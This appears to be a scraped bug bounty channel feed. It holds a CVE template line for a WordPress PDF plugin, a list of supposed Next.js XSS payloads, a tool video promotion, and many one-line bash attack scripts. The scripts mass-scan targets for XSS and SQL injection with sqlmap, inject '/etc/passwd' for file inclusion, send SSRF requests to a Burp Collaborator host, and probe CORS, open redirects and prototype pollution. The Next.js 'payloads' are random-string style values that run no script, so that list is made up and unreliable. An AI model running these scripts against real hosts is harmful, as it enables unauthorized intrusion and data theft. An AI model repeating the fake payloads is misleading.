CVE-2024-9935.yaml
2.2 KB
body="wp-content/plugins/pdf-generator-addon-for-elementor-page-builder/"
🔥14👍6
Lesser-known XSS payloads that work with Next.js
[ what you think? ]
- Dynamic CSS injection
<div style={background-color: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>
- CSS Variable injection
<div style={--var: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>
- Object Literal injection
<div style={position: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>
- CSS Flexbox injection
<div style={display: flex; justify-content: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>
- Unicode Character injection
<div style={font-family: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>
- Dynamic Font injection
<div style={font-family: ${Math.random().toString(36).substr(2, 10) + 'px'}}>XSS</div>
- CSS Animation injection
<div style={animation: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>
- Web Font injection
<div style={font-family: ${Math.random().toString(36).substr(2, 10) + '-webfont'}}>XSS</div>
- CSS Grid injection
<div style={display: grid; grid-template-columns: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>
- CSS Transform injection
<div style={transform: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>
👍25❤3👏3
Today I made a video that uses a tool through the video and can detect XSS through a tool without having to do anything else.
🔥13
🚀 Automated XSS Methodology for Bug Bounty Hunters | 1-Click Exploits
https://youtu.be/nHlOKCCo9kg?si=Rv8f5qK_Gcnwr1ZI
YouTube
🚀 Automated XSS Methodology for Bug Bounty Hunters | xss0r Tool
Welcome, ethical hackers and bug bounty hunters! 🔥 In this video, we unveil a game-changing XSS methodology designed for efficiency and precision. Learn how to leverage 1-click automation tools…
❤10👍2
👨💻 BUG BOUNTY WITH ONE-LINE BASH SCRIPTS 🕵️
𝐗𝐒𝐒 ⪼
cat targets.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @
cat targets.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
𝐒𝐐𝐋𝐢 ⪼
httpx -l targets.txt -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1'
𝐒𝐒𝐑𝐅 ⪼
findomain -t https://target.com -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace http://YOUR.burpcollaborator.net
𝐋𝐅𝐈 ⪼
gau https://vuln.target.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
𝐎𝐏𝐄𝐍 𝐑𝐄𝐃𝐈𝐑𝐄𝐂𝐓 ⪼
gau https://vuln.target.com | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
𝐏𝐑𝐎𝐓𝐎𝐓𝐘𝐏𝐄 𝐏𝐎𝐋𝐋𝐔𝐓𝐈𝐎𝐍 ⪼
subfinder -d https://target.com | httpx -silent | sed 's/$/\/?proto[testparam]=exploit\//' | page-fetch -j 'window.testparam=="exploit"?"[VULN]":"[NOT]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS//g" | grep "VULN"
𝐂𝐎𝐑𝐒 ⪼
gau https://vuln.target.com | while read -r url; do if curl -s -I -H "Origin: https://evvil.com" -X GET "$url" | grep 'https://evvil.com'; then echo "[Potential CORS Found] $url"; else echo "Nothing on $url"; fi; done
𝐄𝐱𝐭𝐫𝐚𝐜𝐭 .𝐣𝐬 ⪼
echo https://target.com | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1
assetfinder https://vuln.target.com | waybackurls | grep -E "\.json(onp?)?$" | anew
𝐄𝐱𝐭𝐫𝐚𝐜𝐭 𝐔𝐑𝐋𝐬 𝐟𝐫𝐨𝐦 𝐜𝐨𝐦𝐦𝐞𝐧𝐭 ⪼
cat targets.txt | html-tool comments | grep -oE '\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]'
𝐃𝐮𝐦𝐩 𝐈𝐧-𝐬𝐜𝐨𝐩𝐞 𝐀𝐬𝐬𝐞𝐭𝐬 𝐟𝐫𝐨𝐦 𝐇𝐚𝐜𝐤𝐞𝐫𝐎𝐧𝐞 ⪼
curl -sL "https://github.com/arkadiyt/bounty-targets-data/blob/master/data/hackerone_data.json?raw=true" | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type]'
𝐅𝐢𝐧𝐝 𝐥𝐢𝐯𝐞 𝐡𝐨𝐬𝐭/𝐝𝐨𝐦𝐚𝐢𝐧/𝐚𝐬𝐬𝐞𝐭𝐬 ⪼
subfinder -d https://vuln.target.com -silent | httpx -silent -follow-redirects -mc 200 | cut -d '/' -f3 | sort -u
𝐒𝐜𝐫𝐞𝐞𝐧𝐬𝐡𝐨𝐭 ⪼
assetfinder -subs-only https://target.com | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @'
🔥18❤14👍8🥰4
⚡️Tiny-XSS-Payloads - A collection of tiny XSS Payloads that can be used in different contexts.
✅tinyxss.terjanq.me
#xss #BugBounty #CyberSecurity
❤10👍2🤡2⚡1👎1🖕1